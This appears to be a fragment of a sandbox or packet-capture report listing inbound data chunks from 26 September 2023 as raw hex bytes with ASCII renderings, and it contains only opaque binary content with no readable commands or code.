2b fe 6c 12 d5 4d cf c8 49 f3 f8 bc 99 59 3f b1 ef 2b 6d c5 65 5d c2 d3 12 f0 4b 09 08 fe 8c 08 4f 00 80 89 28 a6 72 8a 1c b7 78 8b 89 32 21 97 52 4c ec 90 ad 85 68 6a 40 95 9f 3e 05 d0 5c fa 1d 26 ae 65 ec 00 80 28 a9 63 6c Data Ascii: U6^qaiS!b"Jn[F.DiY3\q.qKtMD1l(8vU45*D3')0T+wQkPiHMrZ&NPNQgV;V,I{nJRk$tY0'^(+lMIY?+me]KO(rx2!RLhj@>\&e(cl
2023-09-26 07:46:56 UTC	33	IN	Data Raw: 67 d6 ee e5 c4 87 d3 ea 20 d4 bf fc 01 40 d9 c8 59 a6 4e c0 99 f3 56 a9 3e 1b a6 ae cb c8 d5 f7 22 b9 72 09 85 91 c3 4b f6 5c 89 cf 4b c0 af 88 78 01 a0 90 08 52 8c e9 1a 63 7c b9 6e f1 65 db e2 2d c5 94 78 4c 1a fb 38 07 1d 94 a2 64 fd aa fe f2 4b f7 80 89 73 1a 96 1a ad f1 66 52 e5 d5 05 77 b8 3c 1d e8 ad 3e 39 01 a5 76 9b 3a 44 59 2d 3e 74 c9 c8 cc a1 f2 0c 01 cc 74 b0 1f 77 c0 df 60 ee 51 53 46 3b b5 6c 5b 54 83 41 cf d8 1e 3a 6b d4 d4 d4 e8 f6 86 64 bf 0d f7 88 1f ea 1f 77 36 de d2 35 7d 56 e1 ee be 75 ce 87 54 54 83 de d1 93 fc 88 3a e8 80 d7 19 dd d6 31 73 d7 99 2f 77 d8 de 51 93 d6 8c 49 dd 7b 6b f6 47 03 1b 0d bc ea 5e 5d 28 51 fe 75 d7 c3 2e a7 ad ad 94 04 11 2a ff a7 a2 8c 57 cd c2 1c cd 00 01 92 3e 3d 13 fc 91 b0 44 d5 13 10 c3 76 75 05 7d 60 Data Ascii: g @YNV>"rK\KxRc\|ne-xL8dKsfRw<>9v:DY->ttw`QSF;l[TA:kdw65}VuTT:1s/wQI{kG^](Qu.*W>=Dvu}`
2023-09-26 07:46:56 UTC	34	IN	Data Raw: 6e 72 27 d5 d6 21 25 79 9d db 58 71 9d d9 d0 9c e2 92 99 a3 d5 68 cf 4f 3d 1a 94 63 b1 dd 68 12 b9 13 63 ea 5d ee 4a 9f f9 eb 73 80 5d 10 79 74 af df 0c 3a d3 b6 5e 2b f7 93 1d 95 42 0f e4 7a 3f 69 6c d1 de c8 04 9e b5 81 03 bf de 78 66 cf f1 5a 2d 0f db ab 5c 27 40 bd 7e 1d e5 1c 8f 4b ff 5c a0 69 36 b9 bc 8f 1d 08 54 84 26 88 8d 52 bb 54 37 18 53 02 b1 d5 c1 23 0f 1d 58 d3 d2 c1 8a 94 80 a3 1b 54 2c 07 02 4a 6b b8 35 86 6c c5 19 4b 6d 81 50 85 9d 7e db 86 3a e7 29 98 52 a2 0d 28 26 a2 d7 18 d3 6d 5d e2 cb ba 2e 4f cb 12 f2 bf 80 bf 5b c2 f2 25 11 5d 63 c4 6f 5b 4c df 6e 90 5e 63 a4 4d 15 5c 10 2f 26 75 28 08 15 70 a1 7c 2d 48 8c 23 2f a4 32 1e 64 de cc 4e ff 94 07 cf 3f 4f 44 e5 52 53 3f d5 7a 78 c0 dc e9 a1 ce 24 9a 43 be 62 d3 48 24 ab 6e 1a cc 16 9e Data Ascii: nr'!%yXqhO=chc]Js]yt:^+Bz?ilxfZ-\'@~K\i6T&RT7S#XT,Jk5lKmP~:)R(&m].O[%]co[Ln^cM\/&u(p\|-H#/2dN?ODRS?zx$CbH$n
2023-09-26 07:46:56 UTC	35	IN	Data Raw: 17 89 5f b7 04 44 80 80 88 b8 c4 98 5e 63 a2 6c 5f 47 a0 b4 13 eb 30 d5 be 13 01 53 84 4d 13 75 5f f4 ed 4e c4 0b fd 54 cf fd 78 f5 8f 01 c0 18 e0 f9 64 f2 50 39 66 8f 55 8d 61 20 ae 5d 42 f7 66 73 8f 1d 7c 64 21 43 40 f8 e7 bf 7f be 3f e3 94 29 ef 28 13 d0 4d f9 d1 a2 4e 50 cf 66 70 1a 30 fa ab 0f 6a 0b 8e 7d 53 6c 9c 29 51 ca 32 2d f1 36 79 55 35 85 ea 4b 5f f2 41 c3 cc d5 cf 4a c3 c5 5c 57 fb 1c 04 76 62 c9 1e 2b bd 8a 65 2e b5 6a 59 96 bc 01 e4 60 52 bf 3b 71 09 61 bd ac e1 eb ba 84 af 21 60 75 78 12 23 5d b7 18 5f 63 4c b7 2d c6 6d 8b 29 c6 94 a2 06 64 0c ea 1c 2b e9 80 5b 0b e8 54 19 06 c8 f1 67 05 de 1a d5 4b e0 24 b5 cc 1e a0 ab 46 70 1a 14 aa 67 a5 a0 8d 7b c6 ea 13 11 25 7f c9 cc 17 9b b1 05 4e 66 ef d5 dd c9 38 06 6e 07 90 e8 b4 d4 6c eb 2c 81 Data Ascii: _D^cl_G0SMu_NTxdP9fUa ]Bfs\|d!C@?)(MNPfp0j}Sl)Q2-6yU5K_AJ\Wvb+e.jY`R;qa!`ux#]_cL-m)d+[TgK$Fpg{%Nf8nl,
2023-09-26 07:46:56 UTC	37	IN	Data Raw: 91 8d bc 9b fc ed 61 23 02 10 06 cc 4e 4f d6 62 0c bf 88 f7 ca 25 51 8a 29 d2 ed b6 6d af b7 2d 5e 6f 5b 06 73 cc 54 02 ff 35 00 d8 23 1f e6 d4 78 1c 88 f4 15 a5 42 39 44 74 44 a9 96 a7 02 7c eb 64 6a f3 46 9d f8 71 16 31 89 dd a3 a3 e2 3a bb 07 55 81 be e7 1f a3 f1 fd ef 4a 6a 98 32 3d f3 54 57 76 30 8e f5 dc a9 0d 57 64 0a 74 b3 01 1c e0 17 af 7a da eb c3 00 c8 1d 17 3e ae f4 a1 6c 47 fd 38 93 ec dd 2b de af 6b 77 81 ba 8f 4c 3b 3d 10 0f ed 1c cb dc 42 bc 13 80 99 29 39 6a 4f 4e b1 33 50 d4 2f b4 16 db 57 eb 54 ce 29 cb 99 83 8a 12 4d 6d 94 66 b5 e1 d7 63 65 9f 53 79 28 7e 7e 63 05 1e cd f8 08 5c e2 17 05 82 f6 2e 53 39 44 29 d0 4f 8d f2 3d b3 74 b5 a5 25 40 39 2b 5d 66 ba ae 28 f9 71 bc 3a 30 ec d5 e0 e1 1b 10 c7 6f 0d 93 a5 1e 76 51 a4 08 29 c5 18 53 Data Ascii: a#NOb%Q)m-^o[sT5#xB9DtD\|djFq1:UJj2=TWv0Wdtz>lG8+kwL;=B)9jON3P/WT)MmfceSy(~~c\.S9D)O=t%@9+]f(q:0ovQ)S
2023-09-26 07:46:56 UTC	38	IN	Data Raw: 90 a2 44 41 82 02 ea ab 45 37 a7 78 b5 04 a1 e2 08 b2 93 e2 62 69 27 cb 1e 78 22 b3 55 5b d5 f1 eb 94 d6 63 26 a4 9a 70 84 88 08 31 c6 f8 7a cd de 30 2f 6b ba ac cb 72 59 96 f0 b4 04 7c 5e c2 72 49 0b 3d 6f 11 bf 65 7b 6b e2 15 59 3f 2f 35 48 64 be 97 f1 10 25 50 d1 70 b1 21 0e aa a7 98 fc f0 bd e3 11 5e 26 bd 6d 1d e8 97 97 9e 40 ea bd c9 cf 5f ab b0 c8 d4 a9 af 65 d2 0f 37 1f 94 16 bc 0e 24 6d 73 b1 ff 1a af 9c 23 35 e4 96 3a dc 55 2f 9d 32 e5 3d 65 02 ba 29 1f 26 6f 63 e6 ac c7 ca 66 8b 5e 41 89 a4 91 9b aa 0c 92 f4 8d 60 ef 88 10 00 24 9e db 48 bc 8a 25 f6 ae 57 30 e7 19 38 05 fe d4 31 f4 8e f7 ca cc ce 05 84 25 84 b0 ac 0b 3e 2d 4b b5 95 7b 02 80 90 52 da 62 4a b7 db 2d be 64 30 17 53 8c 42 8b 19 38 a5 15 1f 0d a0 d3 8a 95 fc d2 62 c6 cc 11 75 c2 a2 Data Ascii: DAE7xbi'x"U[c&p1z0/krY\|^rI=oe{kY?/5Hd%Pp!^&m@_e7$ms#5:U/2=e)&ocf^A`$H%W081%>-K{RbJ-d0SB8bu
2023-09-26 07:46:56 UTC	39	IN	Data Raw: 7f ad 35 57 b5 0b eb f2 32 e0 40 5d dc 30 b5 c5 af 67 7a 15 78 91 63 e4 7c 3f b2 da 8a 52 b1 54 09 d5 75 e0 33 de d2 81 0a 14 11 08 03 e0 b2 06 bc ac 4b 78 5e d7 f0 05 11 9f b0 78 b0 8c 5b 7c d9 62 ba 6e 5b dc b6 2d 6e 5b 4c c9 00 2d 39 24 ad 6f 3f 01 73 15 c2 31 cb d9 30 72 00 16 bf e5 b0 03 15 93 09 48 53 6c 9c 42 80 f6 49 12 95 b8 e1 b2 1b aa 6a 97 d6 a8 8d 47 99 ba 00 46 4f 8c f1 fe 75 77 97 6d 9a a7 68 3d 6b 5a e7 66 9c aa ba ce b8 01 81 07 fd bd c4 4e 93 6a 3f c9 97 35 00 75 47 e5 0f a0 b0 eb c4 61 b3 4e 80 b9 01 91 b7 33 46 35 c5 09 70 f6 16 95 d1 8f 90 7b 19 d6 b3 d2 f4 f3 68 b3 e8 18 d0 fe 5c 19 57 72 17 53 50 e8 36 33 77 9c ad 1f 9a f2 c7 40 6f 88 cb 7c ff f9 6a 01 21 d4 16 eb 6d 0d cd 6f d7 f4 0f b1 a9 82 d3 31 93 68 f8 38 50 e8 4e 85 3e 90 f2 Data Ascii: 5W2@]0gzxc\|?RTu3Kx^x[\|bn[-n[L-9$o?s10rHSlBIjGFOuwmh=kZfNj?5uGaN3F5p{h\WrSP63w@o\|j!mo1h8PN>
2023-09-26 07:46:56 UTC	41	IN	Data Raw: cc 46 bf 6e bf f1 a8 2e 36 60 6b c9 13 79 77 d4 fd 78 27 2a 74 2d c7 b5 17 84 ab a9 cd 33 9b f8 86 e1 2b 0e 3e 8a be 9e ae ce bc 82 ca fa 5d 1d 88 8a f2 00 6b 9a 22 22 52 b1 a9 eb 74 58 35 c8 2d ae 0d 39 2a ee 37 f3 37 85 b1 0a 88 05 04 a0 44 04 94 12 25 22 d8 00 b6 98 28 01 00 5d c0 c6 ad 5b 03 22 ac 0b 85 80 98 12 6d 29 41 74 e7 a5 95 00 13 15 d5 da 5f 19 32 26 d3 ac f7 4b c3 48 b2 23 15 01 88 76 96 ec cc 87 72 26 40 6a 0a 51 ff f9 73 91 3d 15 4a 7e 6e 26 3e fa 7d ab f8 11 72 9b 4c dd 94 f7 92 09 e8 a6 bc 97 0c 98 b9 fe 77 eb 8c 42 44 00 18 18 66 8e c8 2e a2 0d 52 a2 1a e7 48 95 05 c2 c0 19 6d 0e d9 6b 74 da 6d 40 5c 63 6a e1 fe a0 9c 0c 33 5e 63 80 a6 b5 fa 8d c6 53 7e 79 51 51 b0 21 40 44 5c 10 96 75 0d 4f 97 65 f9 1a 02 3e 21 c0 4a 40 b0 c5 f8 b2 c5 Data Ascii: Fn.6`kywx't-3+>]k""RtX5-977D%"(]["m)At_2&KH#vr&@jQs=J~n&>}rLwBDf.RHmktm@\cj3^cS~yQQ!@D\uOe>!J@
2023-09-26 07:46:56 UTC	42	IN	Data Raw: e3 13 aa 0c 9f 94 6b b7 b3 3e bf 7b a5 6a 36 cd eb 65 b2 9a 3d 2a a4 6a b4 3e d4 a1 1f 07 18 aa d9 8b 42 0e 06 84 10 42 58 d7 a5 78 b1 44 bc 20 c2 4a 44 10 53 da 6e 5b bc 5e af db eb 6d 8b 31 49 34 02 03 5e 54 7f eb 46 83 c1 94 4a bf 0b e8 34 2d 27 aa 95 15 50 1b a8 28 f5 0b da ae 68 ae a3 5a a9 58 bc e6 19 69 06 cf bf f8 ce 83 08 eb b5 b2 9f 4d d5 e3 ee e8 e7 bf c7 ac 9d 95 33 60 ce dd 73 14 c0 3e 60 3b 64 f0 de 79 87 f0 d6 f2 3e 23 bb f6 5e f2 1e 7d 7b 0b cb f7 08 4b 78 c6 eb 26 ed a2 89 87 18 bc 3d 5e b0 de 3b db 1f a7 2a b9 3b 26 a4 fe 0f a0 c8 9a 2e d8 e1 eb 5a fb ee b0 3d 6c e7 d6 b0 7c ae 1e ef 15 bf 52 54 7c 96 a8 da c8 34 10 af ba 02 72 2a a3 c6 59 42 bd c1 b1 bb 3b a4 e4 0e 44 d4 6d 62 ad c6 5c 16 47 46 e0 31 4d 44 94 62 24 4c 09 62 0c 29 65 db Data Ascii: k>{j6e=j>BBXxD JDSn[^m1I4^TFJ4-'P(hZXiM3`s>`;dy>#^}{Kx&=^;;&.Z=l\|RT\|4r*YB;Dmb\GF1MDb$Lb)e
2023-09-26 07:46:56 UTC	43	IN	Data Raw: aa bf a4 af 91 d6 e9 54 0c 9f 27 da 50 28 39 f2 8c 1d 11 41 08 41 ba 81 50 bc 44 92 c2 56 b6 2d a2 d4 18 ea a5 8c 98 a4 1c d4 d4 dc 50 0a 9c 24 29 59 eb 91 d6 d8 03 00 10 63 a2 2b dc 6e 31 a5 78 59 b2 6d dd ba 2c 97 10 f0 e9 09 97 90 16 5a 6f 1b bc dc 20 dd 52 a4 58 5a 6f 9f 63 c6 8d 28 54 1c d4 31 29 1f ab 26 46 1e 06 34 6b 26 b9 f1 d5 68 57 f8 3e 90 93 60 19 53 15 84 af a2 77 fe c2 b9 cd 33 a9 e8 93 0b 2c 43 11 00 8b 49 a3 dd 74 68 95 1d f5 fb 63 48 bb 3f c1 a6 4c 79 40 26 a0 9b f2 ae e2 f4 13 1b e9 81 39 06 72 15 dc 71 5a bf f7 57 ff b7 85 da f3 34 53 c7 63 ed f7 0c 9c 06 6d a2 dd d2 ed 2b e9 fc 99 95 0b b8 ae 0b 5e 96 10 9e 42 c0 27 00 58 28 51 8c 31 6e b7 db 76 bd 6e f1 16 b3 ce a5 46 6e a0 b0 98 41 42 0c d2 04 20 bf 05 d0 f1 67 f3 90 c8 79 b7 e4 dc Data Ascii: T'P(9AAPDV-P$)Yc+n1xYm,Zo RXZoc(T1)&F4k&hW>`Sw3,CIthcH?Ly@&9rqZW4Scm+^B'X(Q1nvnFnAB gy
2023-09-26 07:46:56 UTC	45	IN	Data Raw: 54 d9 3e 05 ec f4 98 09 b0 53 a0 cd 5a c9 39 66 50 8f ac de d4 6b 15 4e f7 ec 01 d4 cb ac d9 64 75 01 99 57 5d 1c 33 7c 3b 33 43 97 db 2b af d3 9e 3d d0 d6 bb d7 9d ef 3d 80 79 06 d0 ed dd 18 95 db 49 d3 5c c3 b6 5c 3c 5b de 51 7b ee 61 9d de 50 d9 4f 84 74 55 a3 bb f3 e0 bc 30 30 78 b4 f3 5d 95 44 30 9b 5e 93 f6 e8 71 ee d8 de 9d 65 de 76 99 c1 47 87 ab 13 be e0 a1 7c 47 f9 3d e3 d7 1e 3b ba b4 77 1c 7a e8 df 87 bc 97 aa 96 61 c6 75 a4 11 19 ff f3 4c 9a 26 fa 0a f2 28 cc 1e 01 02 12 0a e3 57 ea 4b 49 6c eb 86 67 08 85 e1 aa 43 c3 9e 59 aa a2 0a 54 5a 13 11 61 8b 29 c1 eb ed 9a 52 8a 97 75 bd 2c 4b 58 4b 98 9e 80 88 21 04 0c d7 5b 7c 4d 29 91 30 9d 3c fe 4c b4 62 01 75 96 81 63 13 36 ac 67 08 45 11 32 bb b1 e4 36 a2 6a bb 99 a7 e6 59 e7 ff a9 fb 54 eb 53 Data Ascii: T>SZ9fPkNduW]3\|;3C+==yI\\<[Q{aPOtU00x]D0^qevG\|G=;wzauL&(WKIlgCYTZa)Ru,KXK![\|M)0<Lbuc6gE26jYTS
2023-09-26 07:46:56 UTC	46	IN	Data Raw: 60 10 02 4f 40 9e 36 21 51 0c 54 c0 ac 66 79 59 c3 e5 b2 2e cf 01 f1 02 40 21 11 c5 12 5b ee b6 6d 31 c5 e2 c9 b2 30 72 a2 22 a9 68 cb 02 b4 1a 40 a7 89 38 cb cc e5 57 47 2e 96 01 1a 28 5b 39 51 d5 ac e3 a3 90 a4 e0 38 aa f4 9f 3c 32 b2 c7 92 7d 55 4c 33 09 f4 49 bb ee 5f a5 21 dd f3 b4 99 fd 09 fc 43 1b 6b c3 3e 0e e6 d2 6e 7b 87 85 ee df da b7 21 e2 67 ba 57 74 67 be f7 06 a3 bb c1 d7 f7 dd 2d bb 99 b4 4c 85 fe 72 b4 31 be 07 58 68 56 60 d4 f5 4f 06 e6 3e a4 31 3b 7d 94 b3 f9 1d c6 e5 8e 31 af f3 9e 63 5c 0d 0a 3c d5 d1 2e f8 d7 de 1a 07 8c c5 51 d9 a6 d3 b6 9f 87 0c df 1e 8c d2 bf 63 c3 f8 b5 b6 79 34 74 62 32 28 7a ef ba 68 3f 92 40 1b 6c 12 74 a8 bd 0c ea aa 07 cb b6 bd 99 a7 c2 ea 2d 9a 2a 13 c9 54 14 98 45 81 6d e2 ea 0b 0a d9 66 4e b4 12 ab dd 1c Data Ascii: `O@6!QTfyY.@![m10r"h@8WG.([9Q8<2}UL3I_!Ck>n{!gWtg-Lr1XhV`O>1;}1c\<.Qcy4tb2(zh?@lt-*TEmfN
2023-09-26 07:46:56 UTC	47	IN	Data Raw: 11 62 f1 7a a9 22 bb 3d f2 50 2b cc 42 29 44 d4 52 cb be 80 12 45 8a c5 b4 0e 11 01 56 80 25 84 05 31 db d5 49 78 6e 82 44 14 c9 51 cf dc 25 e5 c7 44 87 41 e4 6f 9a a9 ab de 30 7d 43 4f cd 0f 95 49 ff f6 2c 2e cf 7d 35 2a 95 24 68 50 be 2b d4 59 3b 62 1b f5 87 3f bf 98 9f c7 3f ff fd b4 a9 9b 72 4e 26 a0 9b 72 af 34 4c 86 7c ae 40 a5 6e 89 c9 ac b4 66 93 8f 55 47 c5 c0 87 7a b3 1e c7 71 d9 bd 76 a8 f8 48 a2 1a 49 c6 e8 ad a6 73 aa 17 72 5d 16 54 7e 11 21 38 1b 24 84 0c e6 2e 6b c8 c1 c2 17 7c 02 80 90 12 a5 c8 f1 e5 6e db 96 1d 9f 54 00 2b 94 95 01 73 f5 7f 9a 69 73 78 4e 39 3d a9 83 4b 94 34 c8 eb a8 b7 b1 f2 26 8f a5 66 08 39 8f 6a 45 c5 64 56 fd ce 3e 53 79 08 16 e7 49 fb 2a 13 d8 9b 2f 0c 0f e5 50 b5 61 7e c6 ef 55 ef e5 4e 65 ee 33 72 ed 35 99 61 7a Data Ascii: bz"=P+B)DREV%1IxnDQ%DAo0}COI,.}5$hP+Y;b??rN&r4L\|@nfUGzqvHIsr]T~!8$.k\|nT+sisxN9=K4&f9jEdV>SyI/Pa~UNe3r5az
2023-09-26 07:46:56 UTC	49	IN	Data Raw: 67 bf ac 68 9b 2f 4f 36 3c 50 d8 5d 4c 5d a7 80 dd 56 34 67 85 07 f5 69 db ba 02 c8 1e a5 20 a1 b2 5e a3 70 1f 7b dd 39 d1 df 5c 74 5b 47 06 2a 28 e6 0d 04 8d 52 e8 8e f6 20 2a dd c0 de 00 8f 44 f3 64 19 cd f1 0d 6c d7 70 4a 44 c5 19 74 79 a3 2d 74 59 71 c5 00 18 02 ac 2b 22 10 05 82 1c af 2e 12 51 f2 7a aa 56 bb a6 d4 58 a8 49 07 f2 76 89 b0 b3 4b 4e 1d 88 a3 29 cb 8f be 34 0c 20 07 1b 47 35 92 d5 9f 8b 9b b6 73 89 99 72 af 4c 40 37 e5 50 cc e6 5d 6d e8 35 98 53 20 c5 00 38 bd 11 1f 9d 9a 19 1b 2b 6c ea e4 2b bb cb 9c 5a 54 8b 5a a5 33 81 28 cb 7d 10 e5 fa 5a 1e ca 6a 2a 76 73 44 b0 2c 21 3c ad cb d3 b2 e0 25 04 5c 80 00 b6 18 6f b7 2d c6 db 2d c6 2d c6 1c 5e 2e 25 a8 f0 4a fa a3 59 4c 73 aa 9c c7 29 29 ac e6 3d 5a 2a 70 57 ae 2b 46 4e 80 61 41 78 ca fc Data Ascii: gh/O6<P]L]V4gi ^p{9\t[G(R DdlpJDty-tYq+".QzVXIvKN)4 G5srL@7P]m5S 8+l+ZTZ3(}ZjvsD,!<%\o---^.%JYLs))=ZpW+FNaAx
2023-09-26 07:46:56 UTC	50	IN	Data Raw: b2 95 93 63 db 06 cc 75 d1 83 3c 13 ea bc 92 0e 98 37 8d 93 a8 05 38 b0 2b 07 13 48 e7 af 7d 3f 98 07 c4 c0 f4 44 fd 6f ba df e9 ab 4f cf 93 ab a6 ff 71 4c 5c a7 fd e6 13 0e d3 f4 b6 c4 1f d1 0d 87 91 3e eb 76 86 9a 0f 8f f7 73 57 ce 29 1d 52 f3 ed 47 0d dc 68 6e ab f9 bf a7 8e 7d c4 74 1d b1 74 fd fb 56 b3 40 7b c7 c4 d1 bb 47 ab bd a9 13 c4 61 fd c2 82 ed b2 74 3d 35 4b 1d 7b ce 41 0d 5b bc 1a 97 da 7e 02 b1 c7 32 e3 26 ef 24 f6 fb e2 ed eb 58 95 94 53 37 f1 ea 40 a6 52 a9 26 9f b3 e4 32 08 42 d0 1d d5 54 1b aa e2 a9 53 9c 7f fa f5 96 4c 03 82 98 b1 5a d1 64 c9 b0 6b 5d c2 82 88 61 09 b8 5e 96 90 00 a0 30 75 90 f8 68 94 9f 2f 82 6b 51 6e 01 1f fe 9a ed 07 3f 16 3a 38 fd c2 83 eb 32 08 9a 35 b5 60 ad 3f 2f da f1 27 00 88 9f e9 5d 31 e5 a7 90 09 e8 a6 9c Data Ascii: cu<78+H}?DoOqL\>vsW)RGhn}ttV@{Gat=5K{A[~2&$XS7@R&2BTSLZdk]a^0uh/kQn?:825`?/']1
2023-09-26 07:46:56 UTC	51	IN	Data Raw: c7 95 db 4e 8d 29 53 9c 4c 40 37 e5 50 f4 1e 5e 83 96 b3 72 a4 3b e0 c1 dc 61 79 d8 fc 45 f9 8a c2 ce 99 43 30 03 44 10 11 70 09 18 d6 25 db cc 05 c4 05 80 30 a5 94 6e 31 6e d7 db 76 bb de b6 04 45 2b 43 31 94 06 a8 09 33 d7 05 6e 1d 36 0e 6a 19 16 d1 b1 fd 9d 1d 6c 1d 9a 80 b5 36 bc 37 ca 2e f3 55 69 43 00 ab 17 22 2c a2 7e 36 9c 67 7f a3 78 fc 84 1a 7b 01 0d c0 0e ca a7 a3 fb 5d e6 66 be df ba a2 8f 92 7f 0e 8c f4 33 35 54 b5 17 e0 c7 53 60 77 36 f3 67 1a e2 ef 2a 1a 74 e8 61 1b d9 3e b9 b5 ae 73 df 80 ba f2 f9 4c de b6 4d fe 9a 26 ec d0 df 29 ed ce ff 2f 5a a0 0e 53 59 76 50 51 69 5a af 06 65 34 9c ad 58 2d 96 7c 71 16 b9 e9 66 99 b1 01 85 db 32 66 b2 3a 8d a5 88 d2 36 84 1c 80 3c a6 94 bd 5f 06 84 cb 0a eb 12 42 08 98 df e1 00 00 5b 4c 00 11 12 49 5b Data Ascii: N)SL@7P^r;ayEC0Dp%0n1nvE+C13n6jl67.UiC",~6gx{]f35TS`w6g*ta>sLM&)/ZSYvPQiZe4X-\|qf2f:6<_B[LI[
2023-09-26 07:46:56 UTC	53	IN	Data Raw: 1e 5c a9 a6 fc 4a 32 01 dd 94 5d b9 67 0d e1 4d 7e c1 25 a0 e0 90 a4 a1 fb cb 05 d0 36 72 86 a1 ab 71 e6 ac 1d b1 aa 81 a8 02 3e 06 73 79 d1 c7 40 40 10 63 8a b7 6d db ae d7 2d de 36 66 e6 c8 b6 93 2a d0 50 a6 6c 15 90 e5 f4 89 b5 24 1d e0 13 f5 4a 0f e8 74 e9 02 20 0d 98 33 c0 46 4e 7a 7b 8c dc ce 13 d3 76 79 9e 75 b4 cf 66 cc a8 35 d7 5b d5 cd dd fb 4d 7b a8 7f bd 82 ff 0f 7c 7b ed 8d 16 ef 17 14 60 35 9b a6 1f c2 c0 e9 86 3e 58 bd 3f 4a 3f 4e 3d 77 0f 3f 5e 8e 9e 01 ee e6 bc db 64 ee 47 4d ed 93 e0 55 36 d3 1d 22 c7 8d 88 e1 83 da 0a df 44 77 78 2f 99 d8 c1 8c 4e dd 6e b7 fe 23 86 cf df f7 e3 d5 67 ec 74 35 a3 b2 1d 51 e6 de cd 7b f3 47 33 48 ac 1e c8 c4 53 22 52 e1 0c ba 45 8e 87 56 ab 04 95 31 24 a1 2a f3 77 cc 7f 63 ca 4e 50 2a a3 05 eb b2 ac 61 09 Data Ascii: \J2]gM~%6rq>sy@@cm-6fPl$Jt 3FNz{vyuf5[M{\|{`5>X?J?N=w?^dGMU6"Dwx/Nn#gt5Q{G3HS"REV1$wcNP*a
2023-09-26 07:46:56 UTC	54	IN	Data Raw: 9b 23 1b ab 4d fd ad 40 8e 81 5d 4d df b1 93 03 5f 06 49 80 02 05 e8 94 4a 8b b5 9d 33 cf 00 34 63 d7 61 b8 f6 c1 dc bb 6c cc 47 76 77 bb 79 54 5f cc 98 7e e4 fb 48 8d f9 61 bf 0f 18 cb f7 69 0f 7c f0 eb f7 c3 2b 98 f2 9b 92 d1 5c 79 23 73 75 34 05 df 8b c5 33 a0 6e 27 cd a0 59 95 e5 fb 20 3d b6 ca 00 29 e3 32 ee ff 1e 5b 37 b2 95 7b 6b f0 fa 7a e0 86 16 10 35 e3 e9 d2 8b 9f 0e 0b a0 6b 48 01 2c 21 71 0a 40 f6 90 84 c0 a0 93 f2 39 01 db b6 41 f7 be 1a c6 fa c0 00 75 a1 f5 22 ea a9 40 90 12 14 a6 8e 51 cf ba e0 b2 2c 88 10 96 80 0b 07 35 da 62 51 bf 14 0e 92 49 4c fc ff b3 f7 a7 5b b3 ec 48 76 18 68 06 8f 73 6f 26 5b 12 ab ba 49 16 27 a9 d9 a2 a4 a5 37 92 f4 84 92 de 48 6a 2d 52 14 e7 62 15 55 55 24 9b cc 7b 22 1c d6 3f 00 33 98 19 0c 3e c4 f0 8d d8 99 e7 Data Ascii: #M@]M_IJ34calGvwyT_~Hai\|+\y#su43n'Y =)2[7{kz5kH,!q@9Au"@Q,5bQIL[Hvhso&[I'7Hj-RbUU${"?3>
2023-09-26 07:46:56 UTC	58	IN	Data Raw: d9 a2 69 b6 7a 54 bb 44 b9 1c c8 a9 2c 04 30 97 0e a6 f8 76 4b 12 3a e1 b2 58 8d 4d 50 11 30 92 1e 13 10 ad eb 0a 7f f8 09 6b 26 a2 5f f1 02 29 25 bc a4 b4 e0 0f 04 02 a0 4c 6b 4d 68 c0 4c b5 a9 72 26 2d 2e 42 51 4e 51 2b 95 fd 67 a6 59 ea f4 77 a6 ff f4 f7 96 25 dc 36 81 a4 b6 9b cf f0 09 00 98 84 ee 5b 23 e7 f6 f0 65 85 4e ab 34 a0 5e 47 36 fd 67 a1 c8 1b fb ce 55 65 ae 5b d2 d7 3f ed 47 f5 92 30 5d 8a 3d 44 02 04 58 d7 9c 6f 25 3d 41 be 5e 6f 59 48 99 aa 82 a3 f1 59 65 4e 08 5d a8 d0 01 b5 6b 0a 37 cb 6c 73 21 fd 52 e5 9a ff 5c ed af 23 73 3c bb a2 d0 39 32 67 71 c4 9f 2d f4 c9 db 2f bf d5 06 69 d2 d5 99 10 d2 b1 7a cf c0 cd 81 59 31 3c 13 4f ab ee 93 2b 71 c3 8f 1c cd a5 c0 17 82 04 98 70 dc c6 a8 25 9f 02 87 b8 df fd 55 3f 69 1e 86 7b 4b bc 92 bf d3 Data Ascii: izTD,0vK:XMP0k&_)%LkMhLr&-.BQNQ+gYw%6[#eN4^G6gUe[?G0]=DXo%=A^oYHYeN]k7ls!R\#s<92gq-/izY1<O+qp%U?i{K
2023-09-26 07:46:56 UTC	62	IN	Data Raw: 22 2e 83 95 c1 b5 8b 91 1d cc f4 5b 35 3e 3b 80 16 4c d2 4f 53 33 4c a9 3c 8e 50 2e c3 7a 1d 1a 22 95 73 a6 9f d7 1b 20 42 4e 88 a9 f8 d3 a5 84 88 90 09 68 cd 6b eb a7 53 9e bd af 5c e7 0c 88 28 03 f0 66 b0 7c 7d fc 43 ec 6e cb 4c 5b f0 2d 31 09 dd 37 c3 be 7e b4 0f af b8 35 32 67 d5 3a ed 4f a7 d5 a9 9a 6b 0e 2f 0b 96 a7 20 00 48 10 94 db 4a b7 db 5a c8 5c 25 6a cc a5 f8 07 43 fc e8 46 8a 9c 3a cf b6 98 9d aa 56 59 ad ce 43 27 e6 83 8a 14 f2 3e 27 08 89 03 d8 23 73 66 4e 3b f3 43 d5 b7 76 22 de 8d db 51 e6 f6 fc ee 0c c1 b8 e7 f9 3e e2 2e af f4 8f bb 9b 13 d1 ee 61 83 3b d6 b7 6d 3f 61 fe 58 4e 4c 3c 0b a3 ef 13 d6 2c d2 77 51 d1 23 5f d1 63 1c 6e bf 8d 17 48 26 43 b3 cb 0d 73 cc cd 7e 6e 31 3f b2 69 08 42 7f 37 80 b1 f9 a5 b3 ff 6b fa 9c 8d 5c 59 8a 6c Data Ascii: ".[5>;LOS3L<P.z"s BNhkS\(f\|}CnL[-17~52g:Ok/ HJZ\%jCF:VYC'>'#sfN;Cv"Q>.a;m?aXNL<,wQ#_cnH&Cs~n1?iB7k\Yl
